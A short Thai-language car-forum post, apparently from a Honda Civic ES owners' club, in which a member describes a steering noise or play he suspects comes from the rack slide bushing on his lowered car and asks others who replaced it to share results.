ของผมก็เป็นครับ ซ้ายที่ขวาที่ แต่ผมคิดว่าของผมน่าจะเป็นที่ตัวบู้ทสไลด์แร็ค ตัวที่มันอยู่กลางแร็ค เป็นตัวที่จับคันชักซ้ายขวา ของผมมันขยับขึ้นลงได้ รถผมโหลดด้วย พอขยับพวงมาลัยซ้ายขวา ไอ้ตัวสไลด์เร็คมันก็ขยับขึ้นลงได้ ผมไม่รู้เป็นที่ตัวนี้หรือเปล่า ถ้าใครลองได้เช็คหรือเปลี่ยนมาแล้วหายแจ้งกันด้วยนะครับ
ตอบ
หน้า 1 จาก 2
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2024 Civic ES Group. All rights reserved.